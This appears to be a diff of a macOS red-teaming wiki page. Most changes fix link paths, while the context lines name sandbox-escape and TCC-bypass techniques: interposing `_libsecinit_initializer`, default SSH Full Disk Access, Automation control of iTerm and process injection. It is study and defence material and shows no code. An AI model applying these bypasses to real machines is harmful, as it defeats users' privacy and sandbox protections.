Some **local MacOS tool** that may also help you is `dscl`:
|
Some **local MacOS tool** that may also help you is `dscl`:
|
||||||
|
@ -110,7 +110,7 @@ More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Dis
|
||||||
|
|
||||||
MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin:
|
MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin:
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (563).png>)
|
![](<../../.gitbook/assets/image (563).png>)
|
||||||
|
|
||||||
###
|
###
|
||||||
|
|
|
@ -186,8 +186,8 @@ If from then sandbox process you are able to **compromise other processes** runn
|
||||||
|
|
||||||
For more information about **Interposting** check:
|
For more information about **Interposting** check:
|
||||||
|
|
||||||
{% content-ref url="../macos-proces-abuse/macos-function-hooking.md" %}
|
{% content-ref url="../mac-os-architecture/macos-function-hooking.md" %}
|
||||||
[macos-function-hooking.md](../macos-proces-abuse/macos-function-hooking.md)
|
[macos-function-hooking.md](../mac-os-architecture/macos-function-hooking.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
#### Interpost `_libsecinit_initializer` to prevent the sandbox
|
#### Interpost `_libsecinit_initializer` to prevent the sandbox
|
||||||
|
|
|
@ -195,7 +195,7 @@ The **extended attribute `com.apple.macl`** is added to the new **file** to give
|
||||||
|
|
||||||
By default an access via **SSH** will have **"Full Disk Access"**. In order to disable this you need to have it listed but disabled (removing it from the list won't remove those privileges):
|
By default an access via **SSH** will have **"Full Disk Access"**. In order to disable this you need to have it listed but disabled (removing it from the list won't remove those privileges):
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (569).png>)
|
![](<../../.gitbook/assets/image (569).png>)
|
||||||
|
|
||||||
Here you can find examples of how some **malwares have been able to bypass this protection**:
|
Here you can find examples of how some **malwares have been able to bypass this protection**:
|
||||||
|
|
||||||
|
@ -250,13 +250,13 @@ An app with the **`kTCCServiceAppleEvents`** permission will be able to **contro
|
||||||
|
|
||||||
For more info about Apple Scripts check:
|
For more info about Apple Scripts check:
|
||||||
|
|
||||||
{% content-ref url="macos-apple-scripts.md" %}
|
{% content-ref url="macos-tcc/macos-apple-scripts.md" %}
|
||||||
[macos-apple-scripts.md](macos-apple-scripts.md)
|
[macos-apple-scripts.md](macos-tcc/macos-apple-scripts.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
For example, if an App has **Automation permission over `iTerm`**, for example in this example **`Terminal`** has access over iTerm:
|
For example, if an App has **Automation permission over `iTerm`**, for example in this example **`Terminal`** has access over iTerm:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (2) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### Over iTerm
|
#### Over iTerm
|
||||||
|
|
||||||
|
@ -300,8 +300,8 @@ I you manage to **inject code in a process** you will be able to abuse the TCC p
|
||||||
|
|
||||||
Check process abuse techniques in the following page:
|
Check process abuse techniques in the following page:
|
||||||
|
|
||||||
{% content-ref url="../macos-proces-abuse/" %}
|
{% content-ref url="macos-proces-abuse/" %}
|
||||||
[macos-proces-abuse](../macos-proces-abuse/)
|
[macos-proces-abuse](macos-proces-abuse/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
See some examples in the following sections:
|
See some examples in the following sections:
|